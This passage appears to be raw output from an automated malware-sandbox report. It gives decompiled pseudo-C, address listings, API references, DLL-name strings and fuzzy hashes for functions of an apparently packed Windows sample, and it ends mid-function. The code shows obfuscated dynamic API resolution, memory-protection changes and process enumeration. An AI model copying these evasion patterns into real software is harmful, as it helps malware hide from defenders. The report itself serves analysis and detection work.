                                                          0x00486950
                                                          0x00486956
                                                          0x0048695d
                                                          0x00000000
                                                          0x0048695d
                                                          0x00486887
                                                          0x0048688c
                                                          0x0048688e
                                                          0x00486898
                                                          0x004868a7
                                                          0x004868be
                                                          0x00000000
                                                          0x004868c0
                                                          0x004868cd
                                                          0x00000000
                                                          0x004868cd
                                                          0x004868be
                                                          0x004867c7
                                                          0x004867d1
                                                          0x004867d5
                                                          0x004867e0
                                                          0x004867e7
                                                          0x004867f7
                                                          0x004867fc
                                                          0x00486803
                                                          0x00000000
                                                          0x00000000
                                                          0x0048680b
                                                          0x00486812
                                                          0x00000000
                                                          0x00000000
                                                          0x00486816
                                                          0x0048681b
                                                          0x00486822
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00486822
                                                          0x00486740
                                                          0x00486747
                                                          0x00000000
                                                          0x00000000
                                                          0x00486749
                                                          0x00486757
                                                          0x00486760
                                                          0x00486765
                                                          0x00486767
                                                          0x0048676b
                                                          0x00000000
                                                          0x00000000
                                                          0x0048676f
                                                          0x00486770
                                                          0x00486779
                                                          0x0048677f
                                                          0x00486784
                                                          0x00000000
                                                          0x00486784
                                                          0x0048668b
                                                          0x004866ab
                                                          0x004866ab
                                                          0x004866b1
                                                          0x004866b8
                                                          0x004866be
                                                          0x004866c3
                                                          0x004866c3
                                                          0x004866d8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004866d8
                                                          0x0048668d
                                                          0x00486690
                                                          0x00486698
                                                          0x00000000
                                                          0x00000000
                                                          0x0048669e
                                                          0x004866a1
                                                          0x004866a8
                                                          0x00000000
                                                          0x004865dd
                                                          0x004865dd
                                                          0x004865ef
                                                          0x00486607
                                                          0x00486634
                                                          0x00486634
                                                          0x0048663c
                                                          0x00486643
                                                          0x00486648
                                                          0x00000000
                                                          0x0048664d
                                                          0x0048660f
                                                          0x00486612
                                                          0x00486619
                                                          0x00486621
                                                          0x00000000
                                                          0x00000000
                                                          0x0048662c
                                                          0x0048662c
                                                          0x00486632
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00486632

                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 004868F2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: Display.dll$EnumWindowStationsA$P8,$RemoveVectoredExceptionHandler$RtlEthernetStringToAddressW$credssp.dll$i $nshhttp.dll$vp6$xmllite.dll$Nqt$x?
                                                          • API String ID: 190572456-2255300545
                                                          • Opcode ID: dea4a20d8e45a825f52be4dc2ce9a0c38d229182947d6bb54fb986ae1bd0d74e
                                                          • Instruction ID: bbf9a3e37bb79ade75310c7395790c646b32bff193a35628358a88199ae4e34e
                                                          • Opcode Fuzzy Hash: dea4a20d8e45a825f52be4dc2ce9a0c38d229182947d6bb54fb986ae1bd0d74e
                                                          • Instruction Fuzzy Hash: 20D12579A14746CFCB00EFB8ECA4AED3BB1EF39310B08457AC884A7766E6350549D746
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004BD87C Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 332memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualProtect.KERNEL32(?,00000020,?,?), ref: 004BDCF6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID: 6N$B5d$CNHMWL.dll$GetAccessPermissionsForObjectW$PenIMC_v0400.dll$WcnEapAuthProxy.dll$`gqt$nshhttp.dll$tsbyuv.dll$wmi.dll$>8$L/
                                                          • API String ID: 544645111-615128680
                                                          • Opcode ID: d71d99d5a4a20976c6d4451e7b6b2cf34c31c5c9a41bc704ff2e645c1e99687f
                                                          • Instruction ID: b8e927648c00d83e58d50db7fa20531e06589bca8cd439766b18d3af9eb0209e
                                                          • Opcode Fuzzy Hash: d71d99d5a4a20976c6d4451e7b6b2cf34c31c5c9a41bc704ff2e645c1e99687f
                                                          • Instruction Fuzzy Hash: 29C1D4BAF043468FCB00DFB9E994ADD7FB1EF7A310B0841AAC89497752E234050ADB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0047C07C Relevance: 23.1, APIs: 1, Strings: 12, Instructions: 306libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 0047C1CE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: !WV$/=Y$CIRCoInst.dll$EnumWindowStationsA$EtwEventWriteStartScenario$RtlImpersonateSelfEx$ddrawex.dll$kt"$lyncicon.exe$wlanmsm.dll$wmi.dll$Nqt
                                                          • API String ID: 190572456-3708624718
                                                          • Opcode ID: 096458b6c278c171b1cafdaca43a8506167521a7c052e892db70d08d6a9b274d
                                                          • Instruction ID: 782ee032746633927578dc1e63773aa4da4803b5fbee626c6f0a18fc650533e6
                                                          • Opcode Fuzzy Hash: 096458b6c278c171b1cafdaca43a8506167521a7c052e892db70d08d6a9b274d
                                                          • Instruction Fuzzy Hash: BAC16078A54706AFCB00EFB9E8D0AED7BB0FB28310F44907AD944E7352E6740A49DB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004B983B Relevance: 23.0, APIs: 1, Strings: 12, Instructions: 277processCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 69%
                                                          			E004B983B(char* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				void* _t74;
				void* _t76;
				void* _t78;
				char* _t84;
				void* _t86;
				void* _t87;
				void* _t88;
				void* _t90;
				void* _t96;
				void* _t100;
				void* _t108;
				void* _t113;
				void* _t114;
				void* _t116;
				char* _t119;
				void* _t120;
				void* _t121;
				char* _t161;
				short _t163;
				signed char _t165;
				short _t169;
				short _t173;
				intOrPtr _t175;
				signed int _t183;
				short _t187;
				signed short _t192;
				void* _t195;
				void* _t196;
				void* _t200;
				signed short _t204;
				void* _t205;
				void* _t208;
				void* _t234;

				_t200 = __esi;
				_t195 = __edi;
				_t119 = __ebx;
				_t163 = 0x6f10;
				E004B4C3A(_t69, __ebx, 0x6f10, __edx, __edi, __esi, 1, 0x6f10, 1);
				 *0x5081c0 =  *0x5081c0 - __edx;
				 *(_t208 - 8) = 0x89f2c;
				 *(_t208 - 8) = 0x89f2c;
				_t74 = CreateToolhelp32Snapshot(??, ??);
				_t183 = 0x995a58;
				 *(_t208 - 8) = _t74;
				if(_t74 != 0x235b) {
					L5:
					_t183 = _t183 + 0x91bd;
				} else {
					if(__ebx > 0x26c7f3) {
						L4:
						 *0x508196 = _t163;
						_t163 = _t163 + _t183;
						goto L5;
					} else {
						_t119 = "psxdllsvr.dll";
						if(_t119 == _t119) {
							_t163 = 0x6a50;
							goto L4;
						}
					}
				}
				 *0x508216 =  *0x508216 - _t183;
				_t204 = _t200 + 0x1533379;
				_t196 = _t195 - 0xe877;
				_t76 =  *(_t208 - 8);
				 *(_t208 - 0x44) = _t76;
				 *(_t208 - 8) =  *(_t208 - 8) + _t76;
				_t120 = _t119 - 0x3e;
				 *(_t208 - 8) = _t76;
				_t78 =  *(_t208 - 8);
				if( *(_t208 - 0x44) == 0xffffffff) {
					return _t78;
				} else {
					 *0x50afe5 = _t78;
					 *(_t208 - 8) = _t78;
					if(_t78 != 0x19) {
						_t116 =  *(_t208 - 0xc);
						_t161 = "AddInUtil.exe";
						 *(_t208 - 0x14) =  *(_t208 - 0x14) - _t161;
						_t120 = _t161 - 0x57e2;
						if(_t163 == _t163) {
						}
						if((_t183 & 0x00007f4f) < 0) {
							_t183 = _t183 + 1;
							 *0x50820c = _t183;
							 *0x50afe3 = 0xc1;
							_t116 = 0x182;
							_t196 = _t196 + _t196;
						}
						_t196 = _t196 + 0xd52d85;
						 *0x5083af = _t116;
					}
					_t121 = _t120 - 0x3a8bb3;
					 *0x50810a =  *0x50810a + _t121;
					if(_t121 > _t163) {
						_t175 = E00508174; // 0x28a9
						_t163 = _t175 - 1;
					}
					 *0x5081de = _t183;
					 *0x50afdf =  *0x50afdf + (_t183 | 0x00008a53);
					 *(_t208 - 8) = 0x128;
					_t84 = "ddrawex.dll";
					 *(_t208 - 0x14) =  *(_t208 - 0x14) - "GetAccessPermissionsForObjectW";
					_t165 = _t163 + 0x7a8e - 0x59a459;
					if(_t165 < _t165 || _t165 < _t165) {
						 *0x50afe1 = _t84;
					}
					_t86 =  *(_t208 - 8);
					 *(_t208 - 0x16c) = _t86;
					 *(_t208 - 8) = _t86;
					_t87 =  *(_t208 - 8);
					 *((intOrPtr*)(_t208 - 0x18)) = (0x14cd81 >> _t165) + (0x14cd81 >> _t165) + 0x4680;
					 *(_t208 - 8) = _t87;
					if(_t87 < 0x18) {
						L23:
						_t88 = _t87 + _t87;
						if(_t88 >= 0x1dbf82 || _t88 <= 0x24d1c4) {
							goto L25;
						}
					} else {
						_t113 =  *(_t208 - 0xc);
						 *0x50afdc =  *0x50afdc + 0x320669;
						 *(_t208 - 0x14) = 0x320669;
						_t173 =  *0x50811e; // 0x60ed
						 *0x508170 = _t173;
						_t165 = 0;
						 *0x50820a = 0x8e81;
						if(0x8600 > 0) {
							L25:
							 *0x508120 =  *0x508120 + _t165;
							 *0x50813e =  *0x50813e - _t165;
							_t165 = 0x77e5;
							_t234 = 0x77e5;
						} else {
							if((_t204 & 0x0000b5ed) != 0) {
								 *0x50afe3 =  *0x50afe3 + _t113;
								 *0x50afe3 = _t113;
							}
							_t114 =  *0x50afe5; // -1
							_t87 = _t114 - 0xf1;
							 *0x50870d =  *0x50870d - _t196;
							 *0x50afd8 =  *0x50afd8 + _t87;
							goto L23;
						}
					}
					_t187 =  *0x50820e; // 0x8c83
					_t90 = _t208 - 0x16c;
					_t205 = _t204 - 1;
					 *0x508359 =  *0x508359 + _t205;
					 *0x5083eb =  *0x5083eb + _t90;
					 *(_t208 - 8) = _t90;
					 *(_t208 - 0x10) = "WindowsCodecs.dll";
					E004B6988(0x4a0ccd, _t187, 0x50ff1c, _t205, _t234, 1);
					 *(_t208 - 0x14) =  &(( *(_t208 - 0x14))[0xd34a5]);
					_t96 =  *(_t208 - 8);
					if(0xd34a5 <= _t165) {
						L28:
						 *0x50afe5 = _t96;
					} else {
						 *0x5081b0 = _t187;
						_t192 = _t187 + _t187;
						 *0x50821a =  *0x50821a + _t192;
						if((_t192 & 0x0000aa56) == 0) {
							goto L28;
						}
					}
					 *0x508010 =  *0x508010 - _t96;
					 *(_t208 - 0x170) = _t96;
					_t167 = 0x753c;
					 *(_t208 - 8) = _t96;
					if(_t96 <= 0x153a38) {
						 *(_t208 - 0x14) = "RtlImpersonateSelfEx";
						_t167 = 0x63773b;
						 *0x50818a = 0x753c;
					}
					 *(_t208 - 0xc) =  *(_t208 - 8);
					 *(_t208 - 8) =  *(_t208 - 0xc);
					_t100 =  *(_t208 - 8);
					_push( *(_t208 - 0x170));
					 *0x50afe3 = _t100;
					 *(_t208 - 8) = _t100;
					_t108 =  *(_t208 - 8);
					 *0x508134 = _t167;
					_t169 = _t167 - 0xfffffffffffff03c;
					_push( *(_t208 - 0x44));
					 *0x508188 = _t169;
					if(_t169 != _t169) {
						 *0x509a9f =  *0x509a9f - 0x8d5d;
						 *0x508222 = 0x8d5d;
					}
					 *(_t208 - 8) = _t108;
					 *(_t208 - 0x10) = _t108;
					 *0x50813c = _t169;
					_push(E004B9C6E);
					_push( *0x50920b);
					return  *(_t208 - 8);
				}
			}





































                                                          0x004b983b
                                                          0x004b983b
                                                          0x004b983b
                                                          0x004b983b
                                                          0x004b9844
                                                          0x004b9849
                                                          0x004b9858
                                                          0x004b985b
                                                          0x004b9871
                                                          0x004b987d
                                                          0x004b9883
                                                          0x004b988a
                                                          0x004b98b6
                                                          0x004b98bb
                                                          0x004b988c
                                                          0x004b9892
                                                          0x004b98ad
                                                          0x004b98ad
                                                          0x004b98b4
                                                          0x00000000
                                                          0x004b9894
                                                          0x004b9899
                                                          0x004b98a0
                                                          0x004b98a9
                                                          0x00000000
                                                          0x004b98a9
                                                          0x004b98a0
                                                          0x004b9892
                                                          0x004b98bd
                                                          0x004b98d2
                                                          0x004b98d6
                                                          0x004b98db
                                                          0x004b98de
                                                          0x004b98e1
                                                          0x004b98e6
                                                          0x004b98e9
                                                          0x004b98f1
                                                          0x004b98f8
                                                          0x004ba17d
                                                          0x004b98fe
                                                          0x004b98fe
                                                          0x004b9903
                                                          0x004b9908
                                                          0x004b990a
                                                          0x004b990d
                                                          0x004b9912
                                                          0x004b9917
                                                          0x004b991f
                                                          0x004b991f
                                                          0x004b9929
                                                          0x004b992b
                                                          0x004b992c
                                                          0x004b993e
                                                          0x004b9944
                                                          0x004b9946
                                                          0x004b9946
                                                          0x004b9949
                                                          0x004b994f
                                                          0x004b994f
                                                          0x004b9965
                                                          0x004b996b
                                                          0x004b9975
                                                          0x004b997a
                                                          0x004b9981
                                                          0x004b9981
                                                          0x004b9982
                                                          0x004b999f
                                                          0x004b99a5
                                                          0x004b99a8
                                                          0x004b99b7
                                                          0x004b99bd
                                                          0x004b99c6
                                                          0x004b99d9
                                                          0x004b99d9
                                                          0x004b99e7
                                                          0x004b99ea
                                                          0x004b99f7
                                                          0x004b9a04
                                                          0x004b9a07
                                                          0x004b9a0a
                                                          0x004b9a0f
                                                          0x004b9a76
                                                          0x004b9a76
                                                          0x004b9a7d
                                                          0x00000000
                                                          0x00000000
                                                          0x004b9a11
                                                          0x004b9a11
                                                          0x004b9a19
                                                          0x004b9a1f
                                                          0x004b9a24
                                                          0x004b9a2b
                                                          0x004b9a32
                                                          0x004b9a3d
                                                          0x004b9a49
                                                          0x004b9a88
                                                          0x004b9a90
                                                          0x004b9a97
                                                          0x004b9aa0
                                                          0x004b9aa0
                                                          0x004b9a4b
                                                          0x004b9a50
                                                          0x004b9a52
                                                          0x004b9a58
                                                          0x004b9a5e
                                                          0x004b9a60
                                                          0x004b9a66
                                                          0x004b9a69
                                                          0x004b9a70
                                                          0x00000000
                                                          0x004b9a70
                                                          0x004b9a49
                                                          0x004b9aa8
                                                          0x004b9ab2
                                                          0x004b9ab8
                                                          0x004b9ab9
                                                          0x004b9ace
                                                          0x004b9ad4
                                                          0x004b9ae1
                                                          0x004b9af8
                                                          0x004b9b03
                                                          0x004b9b06
                                                          0x004b9b0b
                                                          0x004b9b2a
                                                          0x004b9b32
                                                          0x004b9b0d
                                                          0x004b9b13
                                                          0x004b9b1a
                                                          0x004b9b1c
                                                          0x004b9b28
                                                          0x00000000
                                                          0x00000000
                                                          0x004b9b28
                                                          0x004b9b41
                                                          0x004b9b48
                                                          0x004b9b4e
                                                          0x004b9b52
                                                          0x004b9b5a
                                                          0x004b9b6b
                                                          0x004b9b72
                                                          0x004b9b78
                                                          0x004b9b78
                                                          0x004b9b95
                                                          0x004b9b9b
                                                          0x004b9ba1
                                                          0x004b9ba7
                                                          0x004b9bbc
                                                          0x004b9bc6
                                                          0x004b9bfd
                                                          0x004b9c05
                                                          0x004b9c11
                                                          0x004b9c16
                                                          0x004b9c19
                                                          0x004b9c22
                                                          0x004b9c28
                                                          0x004b9c2e
                                                          0x004b9c39
                                                          0x004b9c3d
                                                          0x004b9c4a
                                                          0x004b9c59
                                                          0x004b9c62
                                                          0x004b9c67
                                                          0x004b9c6d
                                                          0x004b9c6d

                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 004B9871
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: CreateSnapshotToolhelp32
                                                          • String ID: AddInUtil.exe$B5d$GetAccessPermissionsForObjectW$Microsoft.Office.Tools.Outlook.v9.0.ni.dll$PenIMC_v0400.dll$RtlImpersonateSelfEx$WSearchMigPlugin.dll$WindowsCodecs.dll$ddrawex.dll$lyncicon.exe$psxdllsvr.dll$x4
                                                          • API String ID: 3332741929-3274282594
                                                          • Opcode ID: 20ce2764f3c1e59695204d3b8dc077bddf81dfdf80c6f8bbaedbf9ebc11d3014
                                                          • Instruction ID: 210b0d064c85cda43ff9e512ff9d9878df58d780c71bc00a45d7177e780d9766
                                                          • Opcode Fuzzy Hash: 20ce2764f3c1e59695204d3b8dc077bddf81dfdf80c6f8bbaedbf9ebc11d3014
                                                          • Instruction Fuzzy Hash: F1B19DB9E107068BCB00EFB8D894ADD7BB1EB38310F08416AD984E7356E2750A49DB55
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004A0403 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 230libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 23%
                                                          			E004A0403() {
				_Unknown_base(*)()* _t51;
				_Unknown_base(*)()* _t52;
				_Unknown_base(*)()* _t54;
				_Unknown_base(*)()* _t59;
				_Unknown_base(*)()* _t61;
				_Unknown_base(*)()* _t63;
				_Unknown_base(*)()* _t65;
				_Unknown_base(*)()* _t74;
				_Unknown_base(*)()* _t76;
				_Unknown_base(*)()* _t83;
				intOrPtr _t86;
				void* _t88;
				signed int _t98;
				signed int _t99;
				char* _t114;
				signed char _t130;
				signed char _t132;
				short _t135;
				signed int _t136;
				short _t140;
				short _t151;
				signed int _t152;
				short _t156;
				void* _t163;
				signed int _t166;
				void* _t168;

				if(_t88 >= _t88) {
					L4:
					 *0x50afe0 =  *0x50afe0 - _t151;
					_t152 = 0;
					_t52 =  *0x50afe1; // -128
					L5:
					 *0x50afe3 = _t52;
					_t54 = GetProcAddress(??, ??);
					if((_t152 & 0x0093a253) == 0) {
						_t166 = _t166 >> _t132;
					}
					_t167 = _t166 - 0xcc08;
					if(_t163 >= 0) {
						 *0x50afe5 = _t54;
					}
					 *(_t168 - 8) = _t54;
					 *(_t168 - 0xc) = 0x319293;
					_push(0x319293);
					_push(1);
					_push(1);
					E00467687();
					E004650DC(0, 0x6694, _t152, _t163, _t167, 1);
					 *(_t168 - 0x10) =  &(( *(_t168 - 0x10))[0x6694]);
					_t135 =  *0x50818e; // 0x67a3
					_t59 =  *(_t168 - 8);
					 *0x5093a7 = _t59;
					 *(_t168 - 8) = _t59;
					_t98 = "psxdllsvr.dll";
					 *0x508110 =  *0x508110;
					_t61 =  *(_t168 - 8);
					_t136 = _t135 + _t135;
					if(_t136 <= _t136) {
						_t136 =  !_t136;
					}
					 *(_t168 - 8) = _t61;
					_t63 =  *(_t168 - 8);
					 *(_t168 - 0xc) = _t98;
					_t99 = _t98 & 0x00000045;
					if(_t136 > _t136) {
						 *0x508148 =  *0x508148 - _t136;
					}
					 *0x508182 = _t136;
					_t156 = 0x8b57;
					 *(_t168 - 8) = _t63;
					if(_t99 < 0x36) {
					}
					 *0x508134 = _t136;
					_t65 =  *(_t168 - 8);
					_t139 =  !0x74bb;
					_push(0);
					 *0x50870b =  *0x50870b + _t163 - 1;
					if(_t65 <= 0x870) {
						L20:
						 *(_t168 - 8) =  *(_t168 - 8) + _t65;
						 *(_t168 - 8) = _t65;
						_t103 = 0xffffffffffe3b6f6;
						goto L21;
					} else {
						 *(_t168 - 8) = _t65;
						 *(_t168 - 0xc) = 0x1cc884;
						_t103 = 0x473611;
						 *0x50811e =  *0x50811e - 0x74bb;
						_t139 = 0x175b75a;
						if(0x175b75a <= 0x175b75a) {
							L19:
							 *0x50afe5 =  *0x50afe5 + _t65;
							goto L20;
						}
						_t139 = 0x175b7db;
						 *0x50975f =  *0x50975f - _t156;
						 *0x5081d8 = _t156;
						_t156 =  *0x508226; // 0x298b
						_t167 = 0xb5e5;
						if(0xb5e5 != 0) {
							L21:
							 *0x5080ee =  *0x5080ee + _t103;
							_t140 = _t139 - 1;
							 *0x50818e = _t140;
							 *0x5081a8 = _t156;
							_push( *0x5080b4);
							 *(_t168 - 8) = _t65;
							 *(_t168 - 0xc) = "EtwEventWriteStartScenario";
							 *0x508164 = _t140;
							L0046426A(_t140, _t167, 0x44d32b, 0);
							_t74 =  *(_t168 - 8);
							_push( *0x50809c);
							if(0x82532d >= 0) {
								 *0x50afe3 = _t74;
							}
							 *(_t168 - 8) = _t74;
							_t76 =  *(_t168 - 8);
							_push( *0x508026);
							_t114 =  *(_t168 - 0x10);
							if(0x7640 > 0x7640) {
								 *0x50815a = 0x7640;
							}
							 *(_t168 - 8) = _t76;
							E00465B85(_t167,  &(_t114[_t114]), 1);
							 *(_t168 - 0x10) = "nshhttp.dll";
							_push( *0x5080ce);
							 *0x50812e = 0x8039;
							_t83 =  *(_t168 - 8);
							_push( *0x508026);
							 *(_t168 - 8) = _t83;
							_push(_t83);
							_push(_t83);
							_push(_t83);
							_push(E004A076A);
							goto __eax;
						}
						_t167 = 0;
						goto L19;
					}
				}
				_t130 = _t132;
				_t132 =  *0x508164; // 0x5f72
				 *0x5081b0 = _t151;
				_t152 = 0xffffffffff754fae;
				 *0x50afe1 = _t51;
				if((_t166 & 0x00a6f95c) <= 0) {
					L3:
					 *0x508168 =  *(_t168 - 0x10);
					_t132 = 0x76696b;
					_t151 = _t152 + 0x93cc;
					goto L4;
				}
				_t166 = _t166 + 0xb51de0;
				 *0x50afe5 = _t51;
				_t86 =  *0x50afe6; // -97
				 *0x508010 =  *0x508010 - _t163;
				 *0x508563 =  *0x508563 - _t86;
				_t52 =  *0x50894b;
				if(_t130 > 0x36) {
					goto L5;
				}
				goto L3;
			}





























                                                          0x004a0406
                                                          0x004a047f
                                                          0x004a047f
                                                          0x004a0485
                                                          0x004a0487
                                                          0x004a048d
                                                          0x004a048d
                                                          0x004a0496
                                                          0x004a04a2
                                                          0x004a04a4
                                                          0x004a04a4
                                                          0x004a04a9
                                                          0x004a04b1
                                                          0x004a04b3
                                                          0x004a04b3
                                                          0x004a04b8
                                                          0x004a04c5
                                                          0x004a04db
                                                          0x004a04dc
                                                          0x004a04de
                                                          0x004a04e0
                                                          0x004a04e7
                                                          0x004a04f1
                                                          0x004a04f7
                                                          0x004a0502
                                                          0x004a0511
                                                          0x004a0516
                                                          0x004a0521
                                                          0x004a0526
                                                          0x004a052d
                                                          0x004a0530
                                                          0x004a0535
                                                          0x004a0537
                                                          0x004a0537
                                                          0x004a0547
                                                          0x004a054e
                                                          0x004a0551
                                                          0x004a0554
                                                          0x004a055c
                                                          0x004a055e
                                                          0x004a055e
                                                          0x004a0565
                                                          0x004a056f
                                                          0x004a0573
                                                          0x004a057e
                                                          0x004a057e
                                                          0x004a0584
                                                          0x004a0596
                                                          0x004a0599
                                                          0x004a059b
                                                          0x004a059e
                                                          0x004a05a9
                                                          0x004a0606
                                                          0x004a0613
                                                          0x004a0616
                                                          0x004a061f
                                                          0x00000000
                                                          0x004a05ab
                                                          0x004a05b6
                                                          0x004a05b9
                                                          0x004a05bf
                                                          0x004a05c4
                                                          0x004a05cb
                                                          0x004a05d0
                                                          0x004a05fe
                                                          0x004a0600
                                                          0x00000000
                                                          0x004a0600
                                                          0x004a05d2
                                                          0x004a05d5
                                                          0x004a05db
                                                          0x004a05e9
                                                          0x004a05f0
                                                          0x004a05f7
                                                          0x004a0620
                                                          0x004a0620
                                                          0x004a062c
                                                          0x004a062d
                                                          0x004a0634
                                                          0x004a063b
                                                          0x004a0642
                                                          0x004a0660
                                                          0x004a0669
                                                          0x004a068d
                                                          0x004a0692
                                                          0x004a0695
                                                          0x004a06b3
                                                          0x004a06bc
                                                          0x004a06bc
                                                          0x004a06ca
                                                          0x004a06d5
                                                          0x004a06d8
                                                          0x004a06df
                                                          0x004a06e5
                                                          0x004a06e7
                                                          0x004a06e7
                                                          0x004a06fb
                                                          0x004a0705
                                                          0x004a0712
                                                          0x004a0715
                                                          0x004a0739
                                                          0x004a074e
                                                          0x004a0751
                                                          0x004a0758
                                                          0x004a075b
                                                          0x004a075c
                                                          0x004a075d
                                                          0x004a075e
                                                          0x004a0768
                                                          0x004a0768
                                                          0x004a05f9
                                                          0x00000000
                                                          0x004a05fc
                                                          0x004a05a9
                                                          0x004a0408
                                                          0x004a0411
                                                          0x004a0418
                                                          0x004a0427
                                                          0x004a0428
                                                          0x004a0434
                                                          0x004a0463
                                                          0x004a046a
                                                          0x004a0474
                                                          0x004a047a
                                                          0x00000000
                                                          0x004a047a
                                                          0x004a0436
                                                          0x004a043c
                                                          0x004a0443
                                                          0x004a0449
                                                          0x004a0450
                                                          0x004a0459
                                                          0x004a0461
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: *;$6$Display.dll$EtwEventWriteStartScenario$RtlEthernetStringToAddressW$credssp.dll$ddrawex.dll$nshhttp.dll$psxdllsvr.dll$wlanmsm.dll$Nqt
                                                          • API String ID: 190572456-101125327
                                                          • Opcode ID: c541b3fb91456b454051bc1fe4debd1979c1128657a96cd9c852d798b1038d99
                                                          • Instruction ID: 28e7dd310f3a269981756c663c4de0c6de99d51c9f8f7b4cb362dd5768727146
                                                          • Opcode Fuzzy Hash: c541b3fb91456b454051bc1fe4debd1979c1128657a96cd9c852d798b1038d99
                                                          • Instruction Fuzzy Hash: 9691AF79E403069FDB00EFB4E894AED7BB0FB39314F00506AD984E7352E6780A49DB45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00491711 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 350libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetProcAddress.KERNEL32(?), ref: 00491937
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.438711184.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_FD31.jbxd
                                                          Similarity
                                                          • API ID: AddressProc
                                                          • String ID: EnumWindowStationsA$System.Web.DynamicData.dll$WindowsCodecs.dll$charmap.exe$credssp.dll$nshhttp.dll$psxdllsvr.dll$xmllite.dll$Cqt$Nqt
                                                          • API String ID: 190572456-2454711322
                                                          • Opcode ID: 80b136647fb6f166b64a84947170b175847a5972e9d77212890b2eb2e4eabd34
                                                          • Instruction ID: e71317d0013655ec16321e58812f4326ed17f28530cf46c844fed2f65230c6e2
                                                          • Opcode Fuzzy Hash: 80b136647fb6f166b64a84947170b175847a5972e9d77212890b2eb2e4eabd34
                                                          • Instruction Fuzzy Hash: EAD1C1B9A403438FCB00EFB8EC94ADD7FB1EB39310B44407AC895A7362E6390949E745
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004FF332 Relevance: 19.6, APIs: 1, Strings: 10, Instructions: 339libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 23%
                                                          			E004FF332(void* __ebx, signed int __ecx, unsigned int __edx, unsigned short __edi, void* __eflags) {
				char _t69;
				char _t76;
				char _t88;
				char _t90;
				intOrPtr _t94;
				char _t102;
				char _t106;
				void* _t131;
				void* _t139;
				intOrPtr _t145;
				signed char _t180;
				short _t182;
				signed int _t186;
				short _t187;
				intOrPtr _t191;
				intOrPtr _t199;
				signed int _t201;
				signed int _t202;
				unsigned short _t209;
				unsigned short _t210;
				intOrPtr _t223;
				void* _t224;
				void* _t226;
				short _t227;
				signed int _t228;
				void* _t232;

				_t209 = __edi;
				_t180 = __ecx;
				_t69 =  *((intOrPtr*)(_t232 - 8));
				 *((intOrPtr*)(_t232 - 0x44)) = _t69;
				_t201 = __edx >> __ecx;
				_t223 =  *0x50822c; // 0x9f6d
				 *0x50afe3 = _t69;
				_t224 = _t223 + 0xc0bc60;
				 *((intOrPtr*)(_t232 - 8)) = _t69;
				E004650DC(0xe2, __ecx, _t201, __edi, _t224, "BuildExplicitAccessWithNameA");
				if(0x426397 == 0x426397) {
					if(__ecx < __ecx) {
						_t199 =  *0x508160; // 0x6f15
						_t180 = _t199 + 1;
						 *0x5081ac = _t201;
						_t201 =  *0x5081fa; // 0x8a34
					}
					_t201 = _t201 - 0xa0c0;
					E00508246 = E00508246 + _t224;
				}
				_t226 = _t224 + _t224 + 0xb387ba;
				_push( *((intOrPtr*)(_t232 - 0x44)));
				_t210 = _t209 >> _t180;
				 *((intOrPtr*)(_t232 - 0xc)) =  *((intOrPtr*)(_t232 - 8));
				if(0x19d5c8 <= 0x2d) {
					L10:
					_t182 = 0xffffffffffa59605;
					 *0x50afde =  *0x50afde;
					 *0x508184 = 0xffffffffffa59605;
					if(0xffffffffffa59605 >= 0xffffffffffa59605) {
						goto L11;
					}
				} else {
